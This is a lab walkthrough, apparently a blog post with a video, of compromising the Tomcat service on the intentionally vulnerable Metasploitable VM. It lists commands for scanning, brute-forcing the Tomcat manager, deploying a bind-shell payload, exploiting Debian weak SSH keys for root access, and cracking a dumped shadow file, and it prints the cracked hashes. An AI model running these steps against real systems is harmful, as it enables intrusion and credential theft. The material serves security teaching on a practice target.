Metasploitable - Tomcat

This video demonstrates an attack on the Tomcat service on the metasploitable hackable box.

"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com

"Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process." - tomcat.apache.org

Table of Contents

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Metasploitable-TomCat.mp4

Download (debian_ssh_rsa_2048_x86.tar.bz2): *Coming soon*

Download (usernames.lst): Coming soon

Download (passwords.lst): Coming soon

Method

Use Nmap to scanthe network (gathering information)
Use Nmap to do a more detailed scan of the target (gathering information)
Use Metasploit to brute force the login (gaining access)
Use Metasploit to send a payload (remote access)
I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"
Via the payload it is possible to capture the SSH Key and compare it against the weak keys Just like pWnOS (escalating privileges)
Connect via SSH as root (complete access)
Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)

Tools

Nmap - on Backtrack 4 (Final)
Metasploit - on Backtrack 4 (Final)
SSH - on Backtrack 4 (Final) > John The Ripper - on BackTrack!
Dictionaries/Word-lists - Coming soon
Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) -Coming soon
Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)

Commands

nmap 192.168.1.1-255
nmap -sV -sS -O -f -n 192.168.1.105
firefox 192.168.1.105
msfconsole
search tomcat
use scanner/http/tomcat_mgr_login
show options
setg RHOSTS 192.168.1.105
setg RPORT 8180
set USER_FILE /root/usernames.lst
set PASS_FILE /root/passwords.lst
exploit
use multi/http/tomcat_mgr_deploy
show options
setg USERNAME tomcat
setg PASSWORD tomcat
show payloads
set payload generic/shell_bind_tcp
show options
exploit
ls
whoami
hostname
ls -lart /root
ls -lart /root/.ssh
cat /root/.ssh/authorized_keys
firefox -> www.exploit-db.com-> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc Wv8Vw7bwkf 1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
whoami
hostname
ifconfig
cat /etc/shadow
kate -> Paste -> Save (Filename: /root/shadow)
john
./john --rules --wordlist=/pentest/passwords/wordlists/darkc0de.lst
ssh msfadmin@192.168.1.105



------------------------------------------------------------------------------------root: = root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
sys:batman = sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
klog:123456789 = klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
msfadmin:msfadmin = msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
postgres:postgres = postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
user:user = user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:service = service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
------------------------------------------------------------------------------------

Notes

Song: Underworld - Cowgirl

Video length: 7:07

Capture length: 11:17

Blog Post: https://blog.g0tmi1k.com/2010/07/metasploitable-tomcat/